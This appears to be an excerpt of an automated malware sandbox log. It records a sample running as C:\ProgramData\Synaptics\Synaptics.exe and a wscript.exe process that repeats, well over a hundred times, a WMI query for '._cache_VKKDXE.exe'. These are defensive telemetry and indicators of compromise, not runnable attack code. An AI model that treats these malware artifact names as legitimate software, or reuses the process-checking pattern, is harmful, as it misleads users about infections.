Source: C:\ProgramData\Synaptics\Synaptics.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_VKKDXE.exe'
